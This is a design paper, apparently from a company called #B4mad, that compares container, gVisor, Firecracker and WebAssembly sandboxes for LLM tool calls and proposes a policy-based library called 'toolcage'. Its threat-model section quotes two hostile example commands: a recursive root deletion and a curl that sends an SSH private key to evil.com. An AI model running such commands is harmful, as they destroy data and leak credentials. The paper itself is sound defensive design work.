Sandboxed Tool Execution for Open Models
Author: Roman “Romanov” Research-Rachmaninov, #B4mad Industries Date: 2026-02-19 Bead: beads-hub-42d
Abstract
Tool use is emerging as the critical capability gap between proprietary and open-source language models. Sebastian Raschka (Lex Fridman #490) identifies it as “the huge unlock” but flags trust as the barrier: unconstrained tool execution on a user’s machine risks data destruction, exfiltration, and privilege escalation. This paper evaluates four sandboxing technologies β OCI containers, gVisor, Firecracker microVMs, and WebAssembly (WASM) β for isolating LLM-initiated tool calls. We propose a security-scoped tool execution layer that #B4mad can extract from OpenClaw as a standalone library, enabling any local open model to safely invoke tools.
Context: Why This Matters for #B4mad
OpenClaw already implements sandboxed execution: sub-agents run shell commands, edit files, and control browsers within a managed environment with policy-based access control. This capability is baked into the platform but not extractable. Meanwhile, the open-model ecosystem (Qwen, Llama, Mistral) is rapidly gaining function-calling abilities but lacks a standardized, secure execution runtime. There is a clear product opportunity: a lightweight, embeddable sandbox library that any inference framework (llama.cpp, vLLM, Ollama) can use to safely execute tool calls.
The Trust Problem
When an LLM generates a tool call like exec("rm -rf /") or curl https://evil.com/exfil --data @~/.ssh/id_rsa, the runtime must enforce:
- Filesystem isolation β restrict reads/writes to a scoped directory
- Network policy β block or allowlist outbound connections
- Syscall filtering β prevent privilege escalation, raw device access
- Resource limits β CPU, memory, time caps to prevent DoS
- Capability scoping β per-tool permission grants (this tool may read files but not write; that tool may make HTTP requests but only to api.example.com)
Technology Evaluation
1. OCI Containers (Docker, Podman)
How it works: Tool calls execute inside a container with a minimal filesystem, dropped capabilities, seccomp profiles, and network namespaces.
| Aspect | Assessment |
|---|---|
| Startup latency | 200β500ms (cold), <100ms (warm with pool) |
| Isolation strength | Good β namespace + cgroup + seccomp. Not a security boundary by default, but hardened configs (rootless, no-new-privileges, read-only rootfs) are strong |
| Ecosystem maturity | Excellent β universal tooling, broad adoption |
| Filesystem scoping | Bind-mount specific directories read-only or read-write |
| Network control | --network=none or custom network policies |
| Overhead | Low β shared kernel, minimal memory overhead |
Verdict: Best default choice. Lowest friction, most mature, sufficient isolation for the threat model (untrusted LLM output, not adversarial kernel exploits).
2. gVisor (runsc)
How it works: A user-space kernel that intercepts syscalls, providing an additional isolation layer on top of OCI containers. Used by Google Cloud Run.
| Aspect | Assessment |
|---|---|
| Startup latency | 300β800ms |
| Isolation strength | Excellent β syscall interception means container escapes require defeating both gVisor and the host kernel |
| Ecosystem maturity | Good β drop-in OCI runtime replacement |
| Compatibility | ~90% of Linux syscalls; some edge cases (io_uring, certain ioctls) fail |
| Performance | 5β30% overhead on I/O-heavy workloads due to syscall interposition |
Verdict: Strong choice when higher isolation is needed (e.g., executing code generated by untrusted models). The OCI compatibility means it’s a runtime swap, not an architecture change.
3. Firecracker microVMs
How it works: Lightweight VMs with a minimal VMM (Virtual Machine Monitor), booting a stripped Linux kernel in ~125ms. Used by AWS Lambda and Fly.io.
| Aspect | Assessment |
|---|---|
| Startup latency | 125β200ms (impressive for a full VM) |
| Isolation strength | Maximum β hardware virtualization boundary (KVM). Separate kernel instance |
| Resource overhead | ~5MB memory for the VMM; guest kernel adds ~20β40MB |
| Ecosystem maturity | Moderate β requires KVM, custom rootfs images, API-driven lifecycle |
| Complexity | High β snapshot/restore helps latency but adds operational complexity |
Verdict: Overkill for most tool calls but appropriate for high-risk operations (arbitrary code execution, untrusted plugins). The snapshot/restore pattern could pre-warm VMs for sub-100ms cold starts.
4. WebAssembly (WASM) Sandboxes
How it works: Tool implementations compiled to WASM run in a sandboxed runtime (Wasmtime, WasmEdge) with capability-based security (WASI).
| Aspect | Assessment |
|---|---|
| Startup latency | <1ms (near-instant) |
| Isolation strength | Very good β linear memory model, no raw syscalls, capability-based I/O |
| Ecosystem maturity | Growing but incomplete β WASI preview 2 still stabilizing; not all tools can be compiled to WASM |
| Language support | Rust, C/C++, Go (via TinyGo), Python (via componentize-py, limited) |
| Limitation | Cannot run arbitrary shell commands; tools must be purpose-built as WASM components |
Verdict: Ideal for a curated tool catalog (file operations, HTTP clients, parsers) but cannot sandbox arbitrary shell execution. Complementary to container-based approaches.
Proposed Architecture: toolcage
We propose a library called toolcage (working name) with the following design:
βββββββββββββββββββββββββββββββββββββββ
β Inference Runtime β
β (Ollama / vLLM / llama.cpp) β
β β
β Model generates: tool_call(...) β
β β β
β βΌ β
β βββββββββββββββ β
β β toolcage β β policy engine β
β β library β β sandbox manager β
β ββββββββ¬βββββββ β
β β β
βββββββββββΌββββββββββββββββββββββββββββ
β
βΌ
βββββββββββββββββββββββ
β Sandbox Backend β
β βββββ βββββ βββββ β
β βOCIβ βgViβ βWASβ β
β β β βsorβ βM β β
β βββββ βββββ βββββ β
βββββββββββββββββββββββ
Core Concepts
- Tool Registry β each tool declares its capabilities: filesystem paths, network endpoints, max execution time, required syscalls
- Policy Engine β a TOML/YAML policy file maps tools to allowed capabilities, similar to OpenClaw’s existing tool policies
- Sandbox Backend β pluggable: OCI (default), gVisor (hardened), Firecracker (maximum), WASM (for built-in tools)
- Result Extraction β structured output capture (stdout/stderr/exit code/files) with size limits
Example Policy
[tool.web_fetch]
backend = "oci"
network = ["allowlist:api.example.com:443"]
filesystem = "none"
timeout = "30s"
memory = "128MB"
[tool.code_execute]
backend = "gvisor"
network = "none"
filesystem = { writable = ["/workspace"], readable = ["/data"] }
timeout = "60s"
memory = "512MB"
[tool.file_edit]
backend = "wasm"
filesystem = { writable = ["/workspace/project"] }
network = "none"
timeout = "10s"
Integration Points
- Ollama: Post-generation hook that intercepts tool calls before execution
- vLLM: Custom tool executor callback in the serving layer
- llama.cpp: Function call handler in the server mode
- OpenClaw: Replace the current exec subsystem with toolcage for consistency
Competitive Landscape
| Project | Approach | Gap |
|---|---|---|
| OpenAI Code Interpreter | Proprietary sandbox | Not available locally |
| E2B.dev | Cloud-hosted sandboxes | Requires network round-trip; not local-first |
| Modal | Serverless containers | Cloud-only; not embeddable |
| Daytona | Dev environment sandboxes | Full workspace, not per-tool-call scoped |
| toolcage (proposed) | Local, per-call, policy-scoped | Does not exist yet |
The key differentiator: toolcage would be the first local-first, embeddable, per-tool-call sandbox with declarative security policies.
Recommendations
Start with OCI + rootless Podman as the default backend. It’s available everywhere, well-understood, and sufficient for the primary threat model.
Implement the policy engine first β this is the real value. The sandbox backend is pluggable; the security model is the product.
Ship as a Go or Rust library with a CLI wrapper β embeddable in inference runtimes but also usable standalone (
toolcage exec --policy tools.toml -- python script.py).Contribute to the MCP (Model Context Protocol) ecosystem β Anthropic’s MCP is becoming the standard for tool definitions. A toolcage MCP server that wraps any tool in a sandbox would have immediate adoption.
Extract from OpenClaw incrementally β OpenClaw’s exec subsystem already solves this problem. Factor out the sandbox and policy layers as a library, then have OpenClaw depend on it.
Publish as open source β this positions #B4mad as a thought leader in secure local AI infrastructure, driving adoption toward the broader OpenClaw platform.
Risk Assessment
| Risk | Likelihood | Mitigation |
|---|---|---|
| Container escape via kernel exploit | Low | gVisor/Firecracker backends for high-risk tools |
| Policy misconfiguration allows exfiltration | Medium | Deny-by-default; require explicit allowlists; lint policies |
| Performance overhead kills UX | Medium | Container pooling; WASM for lightweight tools; warm caches |
| Ecosystem moves to cloud-only sandboxes | Low | Local-first is a strong counter-position for privacy-conscious users |
References
- Raschka, S. (2026). Interview on Lex Fridman Podcast #490, “AI State of the Art 2026.” ~32:54 timestamp discussing tool use and containerization.
- Google gVisor Project. https://gvisor.dev/
- AWS Firecracker. https://firecracker-microvm.github.io/
- WebAssembly System Interface (WASI). https://wasi.dev/
- Anthropic Model Context Protocol (MCP). https://modelcontextprotocol.io/
- E2B.dev β Open-source cloud sandboxes for AI. https://e2b.dev/
- Open Containers Initiative (OCI) Runtime Specification. https://opencontainers.org/
This paper was produced by Romanov (Research-Rachmaninov) for #B4mad Industries. Filed under bead beads-hub-42d.